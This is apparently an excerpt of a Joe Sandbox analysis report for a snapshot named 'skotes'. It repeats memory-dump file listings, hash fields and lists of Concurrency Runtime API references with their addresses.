                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b2892e67c96e7fac0725e34e67170f555d2027f2b3ef3fd27ef83c992a8f4f82
                                                                                                                                            • Instruction ID: 5907163fea16d16fdb4664917d75f83b1af900d969a1564dad4877bb717f4bae
                                                                                                                                            • Opcode Fuzzy Hash: b2892e67c96e7fac0725e34e67170f555d2027f2b3ef3fd27ef83c992a8f4f82
                                                                                                                                            • Instruction Fuzzy Hash: A051BCB2A016068FDB25CF58D8817AABBF1FB58314F24856AC406EB394DB74A941CF90
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00AF26E3
                                                                                                                                              • Part of subcall function 00AF24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00AF2504
                                                                                                                                            • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00AF2704
                                                                                                                                            • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00AF2711
                                                                                                                                            • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00AF275F
                                                                                                                                            • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00AF27E6
                                                                                                                                            • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00AF27F9
                                                                                                                                            • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00AF2846
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2530155754-0
                                                                                                                                            • Opcode ID: 64a7161c195ee751735ed9b7b811e75eb05b0070db0a45088e40bc1369b1d41d
                                                                                                                                            • Instruction ID: ecddbcfad3fb1d5bf2197800d07a68a925d08a8e37127997289cc3306b54230d
                                                                                                                                            • Opcode Fuzzy Hash: 64a7161c195ee751735ed9b7b811e75eb05b0070db0a45088e40bc1369b1d41d
                                                                                                                                            • Instruction Fuzzy Hash: 0081AD3190024DABDF169FE4CA91BFE7BB2AF45344F044098FE412B292C7768D15DBA1
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00AF2982
                                                                                                                                              • Part of subcall function 00AF24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00AF2504
                                                                                                                                            • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00AF29A3
                                                                                                                                            • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00AF29B0
                                                                                                                                            • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00AF29FE
                                                                                                                                            • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00AF2AA6
                                                                                                                                            • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00AF2AD8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1256429809-0
                                                                                                                                            • Opcode ID: 4bd8ceae0288e0d5c7068d106ff4b71418d45354b748a5f8b7cae4bf746f3914
                                                                                                                                            • Instruction ID: d9ee7e03e2e296fe0c62a046da8ed962859d518bf104cb09119c0229ad818b78
                                                                                                                                            • Opcode Fuzzy Hash: 4bd8ceae0288e0d5c7068d106ff4b71418d45354b748a5f8b7cae4bf746f3914
                                                                                                                                            • Instruction Fuzzy Hash: 4E71983090024DAFDF25DFA4C991BBEBBB2AF45344F044099FE416B2A2C7729D16DB61
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00AE2876
                                                                                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00AE28DF
                                                                                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00AE2913
                                                                                                                                              • Part of subcall function 00AE07ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00AE080D
                                                                                                                                            • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00AE2993
                                                                                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00AE29DB
                                                                                                                                              • Part of subcall function 00AE07C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00AE07DE
                                                                                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00AE29EF
                                                                                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00AE2A00
                                                                                                                                            • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00AE2A4D
                                                                                                                                            • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00AE2A7E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1321587334-0
                                                                                                                                            • Opcode ID: dfcd8df931dc080e6cb3d81a0ed2cf95c665f382ae8c3e4b503993d90c6ebc83
                                                                                                                                            • Instruction ID: bf771828ced7abff113fe120144e33925c20bfe96adddcdb2f95ad6e96d69561
                                                                                                                                            • Opcode Fuzzy Hash: dfcd8df931dc080e6cb3d81a0ed2cf95c665f382ae8c3e4b503993d90c6ebc83
                                                                                                                                            • Instruction Fuzzy Hash: 2181C171A0069A9FCB38DFAAD894ABDB7F9BF48310B24403DD445E7241DB306D86CB90
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00AE6A1F
                                                                                                                                            • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00AE6A51
                                                                                                                                            • List.LIBCONCRT ref: 00AE6A8C
                                                                                                                                            • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00AE6A9D
                                                                                                                                            • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00AE6AB9
                                                                                                                                            • List.LIBCONCRT ref: 00AE6AF4
                                                                                                                                            • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00AE6B05
                                                                                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00AE6B20
